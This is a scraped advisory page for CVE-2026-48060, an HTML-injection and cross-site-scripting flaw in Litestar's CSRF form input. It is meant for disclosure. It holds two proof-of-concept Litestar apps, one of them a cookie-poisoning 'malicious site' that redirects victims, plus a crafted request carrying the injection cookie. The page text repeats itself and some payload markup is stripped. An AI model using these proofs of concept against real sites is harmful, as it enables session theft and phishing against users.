'\n\n# malicious site which poisons the csrf cookie\n@get(\"/first_site\", response_cookies=[Cookie(key=\"csrftoken\", value=cookie_payload, httponly=True)])\nasync def first_site() -> Template:\n return Template(\n template_name=\"page1.jinja\",\n media_type=MediaType.HTML,\n )\n\n# vulnerable site\n@get(\"/second_site\")\nasync def second_site() -> Template:\n return Template(\n template_name=\"page2.jinja\",\n media_type=MediaType.HTML,\n )\n\n# example function for form submission if csrf verification succeeds\n@post(\"/form_receive\")\nasync def handle_form() -> dict[str, str]:\n return {\n \"message\": \"form data received successfully\"\n }\n\n\nENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(\n searchpath=os.path.join(os.path.dirname(__file__), \"templates\")\n ),\n autoescape=True,\n)\n\ncsrf_config = CSRFConfig(secret=\"my_super_duper_secret\")\n\napp = Litestar(\n route_handlers=[first_site, second_site, handle_form],\n template_config=TemplateConfig(\n directory=Path(\"templates\"),\n engine=JinjaTemplateEngine.from_environment(ENVIRONMENT),\n ),\n csrf_config=csrf_config,\n)\n```\n\n**page1.jinja**\n\n```html\n\n \n

Setting cookie...

\n \n \n\n```\n\n**page2.jinja**\n\n```html\n\n \n

\n \n

\n \n\n```\n\n $\"litestar_poc_first_page_setting_cookie\"$ \n\n $\"litestar_poc_second_page_xss\"$ \n\n# Impact\n\nThis vulnerability affects all Litestar instances that use templates along with CSRF protection that has been configured inline with the documentation section of \"Adding CSRF inputs\" within the \"Templating\" page. An attacker that can successfully exploit this issue can inject arbitrary HTML tags into the page which is then rendered in the victim user's browser. This includes `script` tags, allowing the attacker to escalate the attack to a Cross Site Scripting attack, thus executing arbitrary JavaScript code in the victim's browser. \n\nDepending on the configuration of the site, this could result in the theft of cookies or session tokens. This issue can also allow the attacker to change the appearance of the site. This could enable possible phishing attacks by injecting fake forms into the page or even skimming the information that a user enters into a legitimate form. \n\n# Resources\n\n- https://cwe.mitre.org/data/definitions/79.html\n- https://docs.litestar.dev/2/usage/templating.html\n- https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf\n- https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs","additionalType":"https://schema.org/SoftwareApplication","sameAs":["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48060"]},"keywords":"CVE-2026-48060, high, CWE-79, Litestar Org Litestar","mentions":[{"@type":"SoftwareApplication","name":"Litestar","applicationCategory":"SecurityApplication","publisher":{"@type":"Organization","name":"Litestar Org"}}],"isAccessibleForFree":true},{"@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://portal.vyprsec.ai/"},{"@type":"ListItem","position":2,"name":"CVEs","item":"https://portal.vyprsec.ai/cves"},{"@type":"ListItem","position":3,"name":"CVE-2026-48060","item":"https://portal.vyprsec.ai/cves/CVE-2026-48060"}]}]}

← All advisories

High severity8.1NVD Advisory· Published Jun 10, 2026· Updated Jun 10, 2026

Litestar has HTML Injection Through its CSRF Token

CVE-2026-48060

Description

# Overview

Litestar instances which use a template engine in conjunction with CSRF protection are vulnerable to HTML Injection which can be escalated to Cross Site Scripting due to the contents of the CSRF cookie being excluded from automatic escaping by the template engine when configured inline with documentation recommendations.

We used the latest Litestar version available via PyPI for this disclosure. At the time of writing, that is version 2.21.0 and we have not validated this against the current latest commit on the main branch.

# Special Configurations Required

For a web application to be vulnerable to this issue, it must:

Use templates to render the content which is returned to the user (e.g. Jinja, Mako, MiniJinja)
Have CSRF protection enabled
Have CSRF inputs enabled (i.e. a hidden form field which contains the CSRF token)

Links to relevant documentation for the above configurations:

https://docs.litestar.dev/2/usage/templating.html
https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs

# Reproduction Steps

Visit an application which contains a form, uses templating, has CSRF protection enabled, and which inserts the CSRF token as a hidden input field on forms. A proof of concept application demonstrating this configuration is included later in this disclosure for ease of reproduction.
Observe that the server sets the csrftoken cookie when the page loads.

Set the value of the csrftoken cookie to ">HTML Injection Test.

Refresh the page.
Observe that the contents of the cookie is rendered on the page.

# Exploit Code

There are two Proof-of-Concepts (PoC) included here. The first demonstrates that arbitrary HTML is injected into the page when the user supplies a malicious csrftoken cookie. The second demonstrates how an attacker could deliver an attack using the vulnerability to an unsuspecting user.

The proof-of-concept applications can be started using these commands:

# run poc1
python -m uvicorn poc1:app

# run poc2
python -m uvicorn poc2:app

PoC 1 -

Minimum Vulnerable Application

This proof-of-concept demonstrates that a crafted csrftoken cookie will be rendered on the vulnerable page as HTML.

poc1.py

from litestar import Litestar, get, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig

@get("/")
async def hello_world() -> Template:
    return Template(
        template_name="test.jinja",
        media_type=MediaType.HTML,
    )

ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(
        searchpath=os.path.join(os.path.dirname(__file__), "templates")
    ),
    autoescape=True,
)

csrf_config = CSRFConfig(secret="my_super_duper_secret")

app = Litestar(
    route_handlers=[hello_world],
    template_config=TemplateConfig(
        directory=Path("templates"),
        engine=JinjaTemplateEngine.from_environment(ENVIRONMENT),
    ),
    csrf_config=csrf_config,
)

test.jinja


    
        
            
                {{ csrf_input | safe }}
                Username:
                
                Password:

Sending the following request to the vulnerable page will result in the HTML included in the csrftoken cookie being injected and rendered on the page.

GET /vulnerable HTTP/1.1
Host: localhost:8000
Cookie: csrftoken=">HTML Injection Test

PoC 2 -

Simulated Attack Delivery

This proof-of-concept demonstrates how an attacker could deliver an attack using this vulnerability to an unsuspecting user. We are using this example as it provides for easy local reproduction, it is possible that in end applications there may be various ways to trigger this vulnerability which differ from the example provided.

First, the user must visit a malicious application (the /first_site endpoint in poc2.py) which sets the csrftoken cookie value to a malicious payload. This app must be hosted on the *same top level domain* as the vulnerable application so that the poisoned cookie will automatically be sent by the user's browser to the vulnerable page.

Next, the malicious app *redirects* the user to the vulnerable app (the /second_site endpoint in poc2.py). The victim's browser will automatically send the poisoned cookie to the vulnerable app. This causes the vulnerable application to unsafely write the cookie content to the page and return it to the user, executing the attack in the victim user's browser

poc2.py

from litestar import Litestar, get, post, MediaType
from litestar.response import Template
from litestar.config.csrf import CSRFConfig
from litestar.datastructures import Cookie
import jinja2, os
from pathlib import Path
from litestar import Litestar
from litestar.contrib.jinja import JinjaTemplateEngine
from litestar.template.config import TemplateConfig

cookie_payload = '">'

# malicious site which poisons the csrf cookie
@get("/first_site", response_cookies=[Cookie(key="csrftoken", value=cookie_payload, httponly=True)])
async def first_site() -> Template:
    return Template(
        template_name="page1.jinja",
        media_type=MediaType.HTML,
    )

# vulnerable site
@get("/second_site")
async def second_site() -> Template:
    return Template(
        template_name="page2.jinja",
        media_type=MediaType.HTML,
    )

# example function for form submission if csrf verification succeeds
@post("/form_receive")
async def handle_form() -> dict[str, str]:
    return {
        "message": "form data received successfully"
    }


ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(
        searchpath=os.path.join(os.path.dirname(__file__), "templates")
    ),
    autoescape=True,
)

csrf_config = CSRFConfig(secret="my_super_duper_secret")

app = Litestar(
    route_handlers=[first_site, second_site, handle_form],
    template_config=TemplateConfig(
        directory=Path("templates"),
        engine=JinjaTemplateEngine.from_environment(ENVIRONMENT),
    ),
    csrf_config=csrf_config,
)

page1.jinja


    
        Setting cookie...

page2.jinja


    
        
            
                {{ csrf_input | safe }}
                Username:
                
                Password:

# Impact

This vulnerability affects all Litestar instances that use templates along with CSRF protection that has been configured inline with the documentation section of "Adding CSRF inputs" within the "Templating" page. An attacker that can successfully exploit this issue can inject arbitrary HTML tags into the page which is then rendered in the victim user's browser. This includes script tags, allowing the attacker to escalate the attack to a Cross Site Scripting attack, thus executing arbitrary JavaScript code in the victim's browser.

Depending on the configuration of the site, this could result in the theft of cookies or session tokens. This issue can also allow the attacker to change the appearance of the site. This could enable possible phishing attacks by injecting fake forms into the page or even skimming the information that a user enters into a legitimate form.

# Resources

https://cwe.mitre.org/data/definitions/79.html
https://docs.litestar.dev/2/usage/templating.html
https://docs.litestar.dev/latest/usage/middleware/builtin-middleware.html#csrf
https://docs.litestar.dev/latest/usage/templating.html#adding-csrf-inputs

Affected products

Litestar Org/Litestarllm-fuzzy
Range: <2.21.0

Patches

5c37fb35dc26

chore: Release 2.21.0

https://github.com/litestar-org/litestarJanek NouvertnéFeb 14, 2026Fixed in 2.21.0via release-tag

commit

3 files changed · +496 −484

docs/release-notes/changelog.rst+25 −1 modified

@@ -3,6 +3,30 @@
 Litestar 2 Changelog
 ====================
 
+.. changelog:: 2.21.0
+    :date: 2026-02-14
+
+    .. change:: DI: Fix handling of bound methods returning (async) generators
+        :type: bugfix
+        :issue: 4596
+        :pr: 4597
+
+        Fix a regression introced in github.com/litestar-org/litestar/pull/4459, that
+        would lead to lead to async generators returned from bound methods of DI
+        providers being recognised as a synchronous callable, instead of an async
+        generator.
+
+    .. change:: Add ``after_exception`` option for ``OpenTelemetryConfig``
+        :type: feature
+        :pr: 4595
+        :issue: 4594
+
+        Add an ``after_exception`` option to
+        :class:`~litestar.contrib.opentelemetry.OpenTelemetryConfig`, which will
+        add that hook to the applications ``after_exception`` hooks, allowing the
+        middleware to react to exception, without handling them.
+
+
 .. changelog:: 2.20.0
     :date: 2026-02-08
 
@@ -6539,4 +6563,4 @@ Litestar 2 Changelog
         :issue: 1149
 
         A middleware's ``exclude`` parameter would sometimes not be honoured if the path was used to serve static files
-        using ``StaticFilesConfig``
+        using ``StaticFilesConfig``
\ No newline at end of file

pyproject.toml+1 −1 modified

@@ -64,7 +64,7 @@ maintainers = [
 name = "litestar"
 readme = "docs/PYPI_README.md"
 requires-python = ">=3.8,<4.0"
-version = "2.20.0"
+version = "2.21.0"
 
 [project.urls]
 Blog = "https://blog.litestar.dev"

uv.lock+470 −482 modified

Vulnerability mechanics

Root cause

"The template engine does not automatically escape the contents of the CSRF cookie when it is rendered on the page."

Attack vector

An attacker can exploit this vulnerability by setting the `csrftoken` cookie to a malicious payload containing HTML or script tags. When a user visits a vulnerable page, the server renders the contents of this cookie directly into the HTML response. This can lead to HTML injection or Cross-Site Scripting (XSS) if the payload includes executable JavaScript [ref_id=1]. The attack can be delivered by tricking a user into visiting a malicious site that sets the poisoned cookie, then redirecting them to the vulnerable site [ref_id=1].

Affected code

The vulnerability exists in the Litestar framework's handling of CSRF tokens when used in conjunction with template engines. Specifically, the `csrf_input` tag, when configured as recommended in the documentation, fails to escape the CSRF cookie's value before rendering it into the HTML template [ref_id=1].

What the fix does

The patch addresses the vulnerability by ensuring that the `csrf_input` tag, which renders the CSRF token, properly escapes the cookie's content. This prevents malicious HTML or script tags within the CSRF token from being rendered directly into the page. By escaping the cookie value, the template engine now treats it as literal text, mitigating the risk of HTML injection and XSS attacks [ref_id=1].

Preconditions

configThe application must use a template engine (e.g., Jinja, Mako, MiniJinja).
configCSRF protection must be enabled.
configCSRF inputs must be enabled, meaning the CSRF token is included as a hidden form field.

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

News mentions

No linked articles in our index yet.

cvss	0.455
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000